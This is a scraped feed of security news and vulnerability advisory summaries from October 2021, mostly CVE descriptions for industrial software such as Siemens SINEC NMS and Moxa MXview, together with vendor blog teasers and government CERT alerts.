CWE-123 WRITE-WHAT-WHERE CONDITION: Some API functions permit by-design writing or copying data into a given buffer. Since the client controls these parameters, an attacker could rewrite the memory in any location of the affected product.Read AUVESY Patches versiondog Backup, Restore Vulnerabilities

https://claroty.com/team82/disclosure-dashboard/cve-2021-38449
CVE-2021-22282
2021-10-19T00:00:00Z | 1634601600

Improper copy algorithm in the project extraction component in B&R Automation Studio version 4.0 and later may allow an unauthenticated attacker to execute code.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22282
CVE-2021-22281
2021-10-19T00:00:00Z | 1634601600

A directory traversal vulnerability in the handling of project files in B&R Automation Studio >=4.0 versions allow unauthenticated users to write to certain local directories. The vulnerability is also known as zip slip.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22281
CVE-2021-22280
2021-10-19T00:00:00Z | 1634601600

Improper DLL loading algorithms in B&R Automation Studio may allow an authenticated local attacker to execute code with elevated privileges.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22280
Security Threat Research Highlights #1
2021-10-18T12:48:57Z | 1634561337

In Q1 2021, 190 billion traffic flows passed through Cato’s SASE Network. Leveraging deep network visibility and proprietary machine learning algorithms, our MDR team set out to analyze and identify new cyber threats and critical security trends, and have recently published their findings in the SASE Threat Research Report. Below, we provide you with 5... The post Security Threat Research Highlights #1 appeared first on Cato Networks.

https://www.catonetworks.com/blog/security-threat-research-highlights-1/
Cyber weather in September: rain, storms and sunshine – criminals have gained millions of euros by phishing banking details
2021-10-18T10:55:03Z | 1634554503

Cyber weather has turned autumnal. Facebook’s problems and various denial-of-service attacks affected the availability of services. Fraud campaigns phishing online banking details continued very active. In addition to storm and thunder, there were also a few rays of sunshine as the NCSC-FI at Traficom and the Cyber Security Agency of Singapore announced their collaboration on the mutual recognition of IoT cyber security labels.

https://www.kyberturvallisuuskeskus.fi/en/kybersaa_syyskuu_2021
Cyber weather in September: rain, storms and sunshine – criminals have gained millions of euros by phishing banking details
2021-10-18T10:55:03Z | 1634554503

Cyber weather has turned autumnal. Facebook’s problems and various denial-of-service attacks affected the availability of services. Fraud campaigns phishing online banking details continued very active. In addition to storm and thunder, there were also a few rays of sunshine as the NCSC-FI at Traficom and the Cyber Security Agency of Singapore announced their collaboration on the mutual recognition of IoT cyber security labels.

https://www.kyberturvallisuuskeskus.fi/en/kybersaa_syyskuu_2021
What Microsoft Bing?s IndexNow Means for CDN Users
2021-10-18T10:00:00Z | 1634551200

Microsoft Bing today announced the rollout of IndexNow, a new protocol designed in conjunction with Yandex that can allow ?websites to easily notify search engines whenever their website content is created, updated, or deleted.? The goal is to reduce the amount of time it takes for search engines to discover and index website changes ? a process often measured in days and even weeks ? to mitigate traffic loss and the potential adverse effects on customers and even revenues.

https://www.akamai.com/blog/news/what-microsoft-bings-indexnow-means-for-cdn-users
Security Alert (A21-10-13): Vulnerability in Apache Tomcat
2021-10-18T04:00:00Z | 1634529600

Apache Software Foundation has released a security advisory to address a vulnerability in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
ZTE MF971R xmlclient cross-site scripting vulnerability
2021-10-18T00:00:00Z | 1634515200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1319
ZTE MF971R STK_PROCESS stack-based buffer overflow vulnerability
2021-10-18T00:00:00Z | 1634515200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1321
ZTE MF971R sms_cmd_status_info cross-site scripting vulnerability
2021-10-18T00:00:00Z | 1634515200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1318
ZTE MF971R HTTP_HOST CRLF Injection vulnerability
2021-10-18T00:00:00Z | 1634515200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1313
ZTE MF971R ADB_MODE_SWITCH stack-based buffer overflow vulnerability
2021-10-18T00:00:00Z | 1634515200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1320
ZTE MF971R Referer authentication bypass vulnerability
2021-10-18T00:00:00Z | 1634515200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1317
ZTE MF971R goform_get_cmd_process Config Control External config control vulnerability
2021-10-18T00:00:00Z | 1634515200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1316
Why Cato has Just Hit $2.5B in Valuation
2021-10-17T13:38:04Z | 1634477884

If you are following the SASE, SD-WAN, and cloud-based security markets, you know that they are mostly comprised of very large vendors. Most standalone players in categories such as SD-WAN and CASB had been acquired by these large vendors, in part to enable them to compete in the SASE space by completing their offerings to... The post Why Cato has Just Hit $2.5B in Valuation appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-cato-has-just-hit-2-5b-in-valuation/
High Threat Security Alert (A21-10-11): Multiple Vulnerabilities in Microsoft Products (October 2021)
2021-10-15T04:00:00Z | 1634270400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-10-12): Multiple Vulnerabilities in Adobe Reader/Acrobat
2021-10-15T04:00:00Z | 1634270400

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Implementing form filling and accessibility in the Firefox PDF viewer
2021-10-14T14:23:31Z | 1634221411

Intro Last year, during lockdown, many discovered the importance of PDF forms when having to deal remotely with administrations and large organizations like banks. Firefox supported displaying PDF forms, but … Read more

https://blog.mozilla.org/attack-and-defense/2021/10/14/implementing-form-filling-and-accessibility-in-the-firefox-pdf-viewer/
Integrating Akamai mPulse with Consent Management Providers
2021-10-14T13:00:00Z | 1634216400

Akamai mPulse is a real user monitoring solution, providing detailed information about the user experiences delivered by your web applications. mPulse can be configured within your Akamai property to automatically start collecting data from your customer visits. This initial setup will gather the data required to use advanced features in Adaptive Acceleration such as Script Manager, Automatic Server Push, and Automatic Preconnect.

https://www.akamai.com/blog/performance/integrating-akamai-mPulse-with-consent-management-providers
Akamai MFA in Action: Single Sign-On is Phish-Proof and Simple to Use
2021-10-13T13:00:00Z | 1634130000

Breaking news: we just completed an 850-user pilot with Akamai MFA. In this blog, the first in a series, I?ll explain why we switched to Akamai MFA, how we ran our pilot, and employee feedback so far. Check back for my next blog, when we?re midway through our global deployment. A burglar checks for open windows. Neglecting to lock just one is like leaving the door wide open. In the same way, cyber attackers look for the easiest user accounts to take over ? whether that?s network access credentials, email, on-premise applications, or cloud/SaaS applications. If they?re lucky, they can also use the stolen credentials to breach other systems, an action known as lateral movement.

https://www.akamai.com/blog/security/akamai-mfa-in-action-single-sign-on-is-phish-proof-and-simple-to-use
Nitro Pro PDF JavaScript local_file_path Object use-after-free vulnerability
2021-10-13T00:00:00Z | 1634083200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1265
Nitro Pro PDF JavaScript TimeOutObject double free vulnerability
2021-10-13T00:00:00Z | 1634083200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1266
SonicOS Host Header Redirection
2021-10-12T09:18:17Z | 1634030297

A Host Header Redirection vulnerability in SonicOS potentially allows a remote attacker to redirect firewall management users to arbitrary web domains. To avoid this vulnerability, follow these steps: Upgrade the firmware to the fixed version (6.5.4.8-89n, 7.0.1-R1456 etc. and higher versions),Enable the option 'Enforce HTTP Host Header Check' on the Firewall Administrator page Or use the CLI option, configure > administration > enforce-http-host-check. CVE: CVE-2021-20031 Last updated: March 6, 2024, 2:29 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019
High Threat Security Alert (A21-10-09): Vulnerability in Apple iOS and iPadOS
2021-10-12T04:00:00Z | 1634011200

Apple has released iOS 15.0.2 and iPadOS 15.0.2 to fix the vulnerability in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-10-10): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2021-10-12T04:00:00Z | 1634011200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Microsoft Office Excel 2019/365 ConditionalFormatting code execution vulnerability
2021-10-12T00:00:00Z | 1633996800

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1259
CVE-2021-33736
2021-10-12T00:00:00Z | 1633996800

CWE-89: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND (SQL INJECTION) A privileged authenticated attacker could execute arbitrary commands in the local database by sending crafted requests to the web server of the affected application.The latest update for SINEC NMS fixes multiple vulnerabilities. The most severe could allow an authenticated remote attacker to execute arbitrary code on the system, with system privileges, under certain conditions. Siemens has released an update for SINEC NMS and recommends updating to the latest version. Read more: "Securing Network Management Systems, Part 3: Siemens SINEC NMS"

https://claroty.com/team82/disclosure-dashboard/cve-2021-33736
CVE-2021-33735
2021-10-12T00:00:00Z | 1633996800

CWE-89: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND (SQL INJECTION) A privileged authenticated attacker could execute arbitrary commands in the local database by sending crafted requests to the web server of the affected application.The latest update for SINEC NMS fixes multiple vulnerabilities. The most severe could allow an authenticated remote attacker to execute arbitrary code on the system, with system privileges, under certain conditions. Siemens has released an update for SINEC NMS and recommends updating to the latest version. Read more: "Securing Network Management Systems, Part 3: Siemens SINEC NMS"

https://claroty.com/team82/disclosure-dashboard/cve-2021-33735
CVE-2021-33734
2021-10-12T00:00:00Z | 1633996800

CWE-89: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND (SQL INJECTION) A privileged authenticated attacker could execute arbitrary commands in the local database by sending crafted requests to the web server of the affected application.The latest update for SINEC NMS fixes multiple vulnerabilities. The most severe could allow an authenticated remote attacker to execute arbitrary code on the system, with system privileges, under certain conditions. Siemens has released an update for SINEC NMS and recommends updating to the latest version. Read more: "Securing Network Management Systems, Part 3: Siemens SINEC NMS"

https://claroty.com/team82/disclosure-dashboard/cve-2021-33734
CVE-2021-33733
2021-10-12T00:00:00Z | 1633996800

CWE-89: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND (SQL INJECTION) A privileged authenticated attacker could execute arbitrary commands in the local database by sending crafted requests to the web server of the affected application.The latest update for SINEC NMS fixes multiple vulnerabilities. The most severe could allow an authenticated remote attacker to execute arbitrary code on the system, with system privileges, under certain conditions. Siemens has released an update for SINEC NMS and recommends updating to the latest version. Read more: "Securing Network Management Systems, Part 3: Siemens SINEC NMS"

https://claroty.com/team82/disclosure-dashboard/cve-2021-33733
CVE-2021-33732
2021-10-12T00:00:00Z | 1633996800

CWE-89: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND (SQL INJECTION) A privileged authenticated attacker could execute arbitrary commands in the local database by sending crafted requests to the web server of the affected application.The latest update for SINEC NMS fixes multiple vulnerabilities. The most severe could allow an authenticated remote attacker to execute arbitrary code on the system, with system privileges, under certain conditions. Siemens has released an update for SINEC NMS and recommends updating to the latest version. Read more: "Securing Network Management Systems, Part 3: Siemens SINEC NMS"

https://claroty.com/team82/disclosure-dashboard/cve-2021-33732
CVE-2021-33731
2021-10-12T00:00:00Z | 1633996800

CWE-89: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND (SQL INJECTION) A privileged authenticated attacker could execute arbitrary commands in the local database by sending crafted requests to the web server of the affected application.The latest update for SINEC NMS fixes multiple vulnerabilities. The most severe could allow an authenticated remote attacker to execute arbitrary code on the system, with system privileges, under certain conditions. Siemens has released an update for SINEC NMS and recommends to update to the latest version. Read more: "Securing Network Management Systems, Part 3: Siemens SINEC NMS"

https://claroty.com/team82/disclosure-dashboard/cve-2021-33731
CVE-2021-33730
2021-10-12T00:00:00Z | 1633996800

CWE-89: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND (SQL INJECTION)A privileged, authenticated attacker could execute arbitrary commands in the local database by sending crafted requests to the web server of the affected application.The latest update for SINEC NMS fixes multiple vulnerabilities. The most severe could allow an authenticated remote attacker to execute arbitrary code on the system, with system privileges, under certain conditions. Siemens has released an update for SINEC NMS and recommends to update to the latest version. Read more: "Securing Network Management Systems, Part 3: Siemens SINEC NMS"

https://claroty.com/team82/disclosure-dashboard/cve-2021-33730
CVE-2021-33729
2021-10-12T00:00:00Z | 1633996800

CWE-89: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND (SQL INJECTION)An authenticated attacker could import firmware containers to an affected system and execute arbitrary commands in the local database. The latest update for SINEC NMS fixes multiple vulnerabilities. The most severe could allow an authenticated remote attacker to execute arbitrary code on the system, with system privileges, under certain conditions. Siemens has released an update for SINEC NMS and recommends to update to the latest version. Read more: "Securing Network Management Systems, Part 3: Siemens SINEC NMS"

https://claroty.com/team82/disclosure-dashboard/cve-2021-33729
CVE-2021-33728
2021-10-12T00:00:00Z | 1633996800

CWE-502: DESERIALIZATION OF UNTRUSTED DATA The affected system allows uploading JSON objects that are deserialized to Java objects. Due to insecure deserialization of user-supplied content by the affected software, a privileged attacker could exploit this vulnerability by sending a crafted serialized Java object.The latest update for SINEC NMS fixes multiple vulnerabilities. The most severe could allow an authenticated remote attacker to execute arbitrary code on the system, with system privileges, under certain conditions. Siemens has released an update for SINEC NMS and recommends to update to the latest version. Read more: "Securing Network Management Systems, Part 3: Siemens SINEC NMS"

https://claroty.com/team82/disclosure-dashboard/cve-2021-33728
CVE-2021-33727
2021-10-12T00:00:00Z | 1633996800

CWE-200: EXPOSURE OF SENSITIVE INFORMATION TO AN UNAUTHORIZED ACTOR An authenticated attacker could download the user profile of any user, allowing an attacker to leak confidential information.The latest update for SINEC NMS fixes multiple vulnerabilities. The most severe could allow an authenticated remote attacker to execute arbitrary code on the system, with system privileges, under certain conditions. Siemens has released an update for SINEC NMS and recommends to update to the latest version

https://claroty.com/team82/disclosure-dashboard/cve-2021-33727
CVE-2021-33726
2021-10-12T00:00:00Z | 1633996800

CWE-22 IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY (PATH TRAVERSAL):The affected system allows to download arbitrary files under a user-controlled path and does not correctly check if the relative path is still within the intended target directory.The latest update for SINEC NMS fixes multiple vulnerabilities. The most severe could allow an authenticated remote attackers to execute arbitrary code on the system, with system privileges, under certain conditions. Siemens has released an update for SINEC NMS and recommends to update to the latest version. Read more: "Securing Network Management Systems, Part 3: Siemens SINEC NMS"

https://claroty.com/team82/disclosure-dashboard/cve-2021-33726
CVE-2021-33725
2021-10-12T00:00:00Z | 1633996800

CWE-22 IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY (PATH TRAVERSAL):The affected system allows the deletion of arbitrary files or directories under a user-controlled path and does not correctly check if the relative path is still within the intended target directory.The latest update for SINEC NMS fixes multiple vulnerabilities. The most severe could allow an authenticated remote attackers to execute arbitrary code on the system, with system privileges, under certain conditions. Siemens has released an update for SINEC NMS and recommends to update to the latest version. Read more: "Securing Network Management Systems, Part 3: Siemens SINEC NMS"

https://claroty.com/team82/disclosure-dashboard/cve-2021-33725
CVE-2021-33724
2021-10-12T00:00:00Z | 1633996800

CWE-22 IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY (PATH TRAVERSAL): The affected system contains an arbitrary file deletion vulnerability that could allow an attacker to delete an arbitrary file or directory under a user-controlled path.The latest update for SINEC NMS fixes multiple vulnerabilities. The most severe could allow an authenticated remote attackers to execute arbitrary code on the system, with system privileges, under certain conditions. Siemens has released an update for SINEC NMS and recommends to update to the latest version Read more: "Securing Network Management Systems, Part 3: Siemens SINEC NMS"

https://claroty.com/team82/disclosure-dashboard/cve-2021-33724
CVE-2021-33723
2021-10-12T00:00:00Z | 1633996800

CWE-285: IMPROPER AUTHORIZATION An authenticated attacker could change the user profile of any user without proper authorization, which could allow an attacker to change the password of any user in the affected system.The latest update for SINEC NMS fixes multiple vulnerabilities. The most severe could allow an authenticated remote attackers to execute arbitrary code on the system, with system privileges, under certain conditions. Siemens has released an update for SINEC NMS and recommends to update to the latest version. Read more: "Securing Network Management Systems, Part 3: Siemens SINEC NMS"

https://claroty.com/team82/disclosure-dashboard/cve-2021-33723
CVE-2021-33722
2021-10-12T00:00:00Z | 1633996800

CWE-22 IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY (PATH TRAVERSAL): The affected system has a path traversal vulnerability when exporting a firmware container, which could allow a privileged, authenticated attacker to create arbitrary files on an affected system.The latest update for SINEC NMS fixes multiple vulnerabilities. The most severe could allow an authenticated remote attackers to execute arbitrary code on the system, with system privileges, under certain conditions. Siemens has released an update for SINEC NMS and recommends to update to the latest version. Read more: "Securing Network Management Systems, Part 3: Siemens SINEC NMS"

https://claroty.com/team82/disclosure-dashboard/cve-2021-33722
Guest writer: Updates under control? SeniorSurf helps the elderly go digital
2021-10-11T13:54:20Z | 1633960460

SeniorSurf encourages older people to use computers and the internet. The association operates nationwide and supports tuition in digital skills for older people. To celebrate the European Cybersecurity Month, we have invited as guest writers Liisa Tiainen and Tiina Etelämäki to present the SeniorSurf activities of the Finnish Association for the Welfare of Older People. Let us help everyone learn cyber skills – growing old should not stop anyone from being active in the digital world.

https://www.kyberturvallisuuskeskus.fi/en/news/guest-writer-updates-under-control-seniorsurf-helps-elderly-go-digital
Guest writer: Updates under control? SeniorSurf helps the elderly go digital
2021-10-11T13:54:20Z | 1633960460

SeniorSurf encourages older people to use computers and the internet. The association operates nationwide and supports tuition in digital skills for older people. To celebrate the European Cybersecurity Month, we have invited as guest writers Liisa Tiainen and Tiina Etelämäki to present the SeniorSurf activities of the Finnish Association for the Welfare of Older People. Let us help everyone learn cyber skills – growing old should not stop anyone from being active in the digital world.

https://www.kyberturvallisuuskeskus.fi/en/news/guest-writer-updates-under-control-seniorsurf-helps-elderly-go-digital
Assessment of report on the cyber security of mobile devices
2021-10-11T13:48:51Z | 1633960131

The National Cyber Security Centre Finland (NCSC-FI) at the Finnish Transport and Communications Agency Traficom has examined the report prepared by the National Cyber Security Centre of Lithuania on its assessment of mobile devices by three manufacturers. The NCSC-FI found the content of the Lithuanian authority’s report to be mainly accurate. The NCSC-FI’s assessment of third-party online shops may affect cyber security.

https://www.kyberturvallisuuskeskus.fi/en/news/assessment-report-cyber-security-mobile-devices
Assessment of report on the cyber security of mobile devices
2021-10-11T13:48:51Z | 1633960131

The National Cyber Security Centre Finland (NCSC-FI) at the Finnish Transport and Communications Agency Traficom has examined the report prepared by the National Cyber Security Centre of Lithuania on its assessment of mobile devices by three manufacturers. The NCSC-FI found the content of the Lithuanian authority’s report to be mainly accurate. The NCSC-FI’s assessment of third-party online shops may affect cyber security.

https://www.kyberturvallisuuskeskus.fi/en/news/assessment-report-cyber-security-mobile-devices
Personalized alerts straight from production environments
2021-10-11T13:23:24Z | 1633958604

Good descriptive logs are an essential part of every code that makes it to production. But once the deliverable leaves your laptop, how much do you really look at them? Sure, when catastrophe hits, they provide a lot of the required context of the problem, but if everything just works (or so you think) do... The post Personalized alerts straight from production environments appeared first on Cato Networks.

https://www.catonetworks.com/blog/personalized-alerts-straight-from-production-environments/
VB2021 localhost is over, but the content is still available to view!
2021-10-11T11:38:00Z | 1633952280

VB2021 localhost - VB's second virtual conference - took place last week, but you can still watch all the presentations. Read more

https://www.virusbulletin.com/blog/2021/10/vb2021-localhost-over-content-still-available-view/
Anker Eufy Homebase 2 pushMuxer processRtspInfo heap buffer overflow vulnerability
2021-10-11T00:00:00Z | 1633910400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1369
Anker Eufy Homebase 2 pushMuxer CreatePushThread use-after-free vulnerability
2021-10-11T00:00:00Z | 1633910400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1370
The Hybrid Workforce: Planning for the New Working Reality
2021-10-10T12:40:48Z | 1633869648

The post The Hybrid Workforce: Planning for the New Working Reality appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-hybrid-workforce-planning-for-the-new-working-reality/
High Threat Security Alert (A21-10-07): Vulnerability in Apache HTTP Server
2021-10-08T04:00:00Z | 1633665600

The Apache Software Foundation released a security update to address a vulnerability in the HTTP Server and its modules.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-10-08): Multiple vulnerabilities in Google Chrome
2021-10-08T04:00:00Z | 1633665600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Mitigating CVE-2021-41773: Apache HTTP Server Path Traversal
2021-10-07T20:15:00Z | 1633637700

On September 29, Ash Daulton, along with the cPanel Security Team, reported a path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.29 to the Apache security team. The issue was fixed within two days, under CVE-2021-41773, and the patch was released on October 4. Apache urged to deploy the fix, as it is already being actively exploited.

https://www.akamai.com/blog/news/how-akamai-helps-you-protect-against-0-days
Coming Together to Tackle Phishing ? For the Greater Good
2021-10-07T13:20:00Z | 1633612800

Every day, Akamai?s Threat Research team tracks and mitigates phishing attack campaigns to help keep our customers ? and their reputations ? protected. Recently, they tracked an orchestrated attack campaign comprising more than 9,000 domains and subdomains, mainly targeting victims located in China. The phishing scam was abusing more than 15 high-profile and trusted brands spanning ecommerce, travel, and food & beverage industries. By using well-known brand names, the threat actors attempted to engage victims to participate in a quiz that, once completed, would result in winning an attractive prize. Akamai refers to this malicious modus operandi as a ?question quiz? phishing attack campaign.

https://www.akamai.com/blog/security/coming-together-to-tackle-phishing-for-the-greater-good
Attack Campaigns Ramp Up for Organizations Down Under
2021-10-07T13:15:00Z | 1633612500

DDoS and AppSec attacks impacting the ANZ region (Australia and New Zealand) have been in the headlines of late, with several high profile companies seeing prolonged outages and leading to speculation as to whether the region is being specifically targeted? Let?s take a closer look at the types of attack vectors and malicious activity we?ve seen focused on customers down under.

https://www.akamai.com/blog/security/attack-campaigns-ramp-up-for-organizations-down-under
Making the Internet Resilient: Part One
2021-10-07T13:00:00Z | 1633611600

Think how many websites you visit or videos you stream. Do you check your bank account or transfer money, download apps, play music, share updates on social media, or use the internet for any of the thousands of other digital experiences it enables every day?

https://www.akamai.com/blog/performance/making-the-internet-resilient-part-one
Security Alert (A21-10-06): Multiple Vulnerabilities in Cisco Products
2021-10-07T04:00:00Z | 1633579200

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
The Impact of Third-Party Scripts on the Facebook Outage
2021-10-06T15:00:14Z | 1633532414

A lot has already been written about the Facebook outage earlier this week. In case you missed it (if that?s possible), Facebook, Facebook Messenger, Instagram, and WhatsApp were all down for several hours on Monday. Facebook provided an update on the cause of the outage late Monday, citing a configuration change on their backbone routers as the root cause, with additional details in a subsequent blog post.

https://www.akamai.com/blog/news/the-impact-of-third-party-scripts-on-the-facebook-outage
Forrester: Embrace Zero Trust for Australia?s Essential Eight
2021-10-06T13:00:00Z | 1633525200

Understand why it's important to refine your organization?s approach. See how to enact a security model that protects your business and enables growth.

https://www.akamai.com/blog/news/forrester-embrace-zero-trust-for-australias-essential-eight
Brushing up on basic cybersecurity skills – Join us!
2021-10-06T09:56:56Z | 1633514216

The European Cybersecurity Month (ECSM) is for everyone who uses the internet and smart devices. The campaign offers tips on how to improve your cybersecurity and, for example, help your family and friends protect themselves against online fraud. The European campaign to promote cybersecurity will feature prominently on our website and social media channels. Join us!

https://www.kyberturvallisuuskeskus.fi/en/news/brushing-basic-cybersecurity-skills-join-us
Brushing up on basic cybersecurity skills – Join us!
2021-10-06T09:56:56Z | 1633514216

The European Cybersecurity Month (ECSM) is for everyone who uses the internet and smart devices. The campaign offers tips on how to improve your cybersecurity and, for example, help your family and friends protect themselves against online fraud. The European campaign to promote cybersecurity will feature prominently on our website and social media channels. Join us!

https://www.kyberturvallisuuskeskus.fi/en/news/brushing-basic-cybersecurity-skills-join-us
SSE: It’s SASE without the “A”
2021-10-06T06:50:20Z | 1633503020

As IT leaders look to address the needs of the digital enterprise, significant changes are being pushed onto legacy networking and security teams. When those teams are in lockstep and ready to change, SASE adoption is the logical evolution. But what happens when security teams want to modernize their tools and services but networking teams... The post SSE: It’s SASE without the “A” appeared first on Cato Networks.

https://www.catonetworks.com/blog/security-service-edge-sse-its-sase-without-the-a/
High Threat Security Alert (A21-10-03): Multiple Vulnerabilities in Apache HTTP Server
2021-10-06T04:00:00Z | 1633492800

The Apache Software Foundation released a security update to address multiple vulnerabilities in the HTTP Server and its modules.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-10-04): Multiple Vulnerabilities in Android
2021-10-06T04:00:00Z | 1633492800

Google has released Android Security Bulletin October 2021 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-10-05): Multiple Vulnerabilities in Firefox
2021-10-06T04:00:00Z | 1633492800

Mozilla has published the advisories (MFSA2021-43, MFSA2021-44 and MFSA2021-45) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2021-38399
2021-10-06T00:00:00Z | 1633478400

CWE-23 RELATIVE PATH TRAVERSAL: The affected product is vulnerable to relative path traversal, which may allow an attacker access to unauthorized files and directories.Read more: "Target DCS: Finding, Fixing Critical Bugs In Honeywell Experion PKS"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38399
CVE-2021-38397
2021-10-06T00:00:00Z | 1633478400

CWE-434 UNRESTRICTED UPLOAD OF FILE WITH DANGEROUS TYPE:The affected product is vulnerable to unrestricted file uploads, which may allow an attacker to remotely execute arbitrary code and cause a denial-of-service condition.Read more: "Target DCS: Finding, Fixing Critical Bugs In Honeywell Experion PKS"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38397
CVE-2021-38395
2021-10-06T00:00:00Z | 1633478400

CWE-74 IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS IN OUTPUT USED BY A DOWNSTREAM COMPONENT: The affected product is vulnerable to improper neutralization of special elements in output, which may allow an attacker to remotely execute arbitrary code and cause a denial-of-service condition.Read more: "Target DCS: Finding, Fixing Critical Bugs In Honeywell Experion PKS"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38395
The Power of Why: Rediscovering Akamai?s Purpose
2021-10-05T16:00:26Z | 1633449626

As I took on the role of Chief Marketing Officer of Akamai earlier this year, I set out to inspire and challenge our teams to build an impactful global campaign that showcases not just what we do, but what we make possible. What quickly became clear is that to be authentic in talking about what we make possible, we first needed to get crystal clear on our why ? WHY our company exists, and what our greater impact on the world is.

https://www.akamai.com/blog/news/the-power-of-why-rediscovering-akamais-purpose
MKM: #Bürokratt muudab riigiga suhtluse radikaalselt lihtsamaks
2021-10-05T08:25:13Z | 1633422313

Septembris algasid kodaniku virtuaalse assistendi #bürokratt tehnilised arendustööd, et aasta lõpuks saaks #bürokrati juba kolmes riigi teeninduskeskkonnas kasutusele võtta. Täna tutvustas asekantsler Siim Sikkut #bürokrati visiooni ka e-Eesti esitluskeskust külastanud Euroopa Komisjoni president Ursula von der Leyenile.

https://ria.ee/uudised/mkm-burokratt-muudab-riigiga-suhtluse-radikaalselt-lihtsamaks
CVE-2021-42539
2021-10-05T00:00:00Z | 1633392000

CWE-306 MISSING AUTHENTICATION FOR CRITICAL FUNCTION:The affected product is vulnerable to a missing permission validation on system backup restore, which could lead to account take over and unapproved settings change.

https://claroty.com/team82/disclosure-dashboard/cve-2021-85337
CVE-2021-42538
2021-10-05T00:00:00Z | 1633392000

CWE-78 IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN OS COMMAND:The affected product is vulnerable to a parameter injection via passphrase, which enables the attacker to supply uncontrolled input.

https://claroty.com/team82/disclosure-dashboard/cve-2021-81019
CVE-2021-38460
2021-10-05T00:00:00Z | 1633392000

CWE-523 UNPROTECTED TRANSPORT OF CREDENTIALS: The affected product is vulnerable to password leakage, which may allow an attacker to obtain credentials through unprotected transport. Read more: "Securing Network Management Systems, Part 2: Moxa MXview"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38460
CVE-2021-38458
2021-10-05T00:00:00Z | 1633392000

CWE-74 IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS IN OUTPUT USED BY A DOWNSTREAM COMPONENT ('INJECTION'): The affected product is vulnerable to improper neutralization of special elements, which may allow an attacker to remotely execute unauthorized commands. This could allow an attacker to disable software or read and modify otherwise inaccessible data. Read more: "Securing Network Management Systems, Part 2: Moxa MXview"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38458
CVE-2021-38456
2021-10-05T00:00:00Z | 1633392000

CWE-259 USE OF HARD-CODED PASSWORD:The affected product uses hard-coded passwords, which may allow an attacker to gain access through accounts using default passwords. Read more: "Securing Network Management Systems, Part 2: Moxa MXview"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38456
CVE-2021-38454
2021-10-05T00:00:00Z | 1633392000

CWE-284 IMPROPER ACCESS CONTROL: The affected product has a misconfigured service that allows remote connections to internal communication channels, which may allow an attacker to interact and use MQTT remotely. Read more: "Securing Network Management Systems, Part 2: Moxa MXview"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38454
CVE-2021-38452
2021-10-05T00:00:00Z | 1633392000

CWE-22 IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY ('PATH TRAVERSAL'):A path traversal vulnerability in the application may allow an attacker to create or overwrite critical files used to execute code, such as programs or libraries. Read more: "Securing Network Management Systems, Part 2: Moxa MXview"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38452
CVE-2021-42542
2021-10-05T00:00:00Z | 1633392000

CWE-22 IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORYThe affected product is vulnerable to directory traversal due to mishandling of provided backup folder structure.

https://claroty.com/team82/disclosure-dashboard/cve-2021-24769
CVE-2021-42540
2021-10-05T00:00:00Z | 1633392000

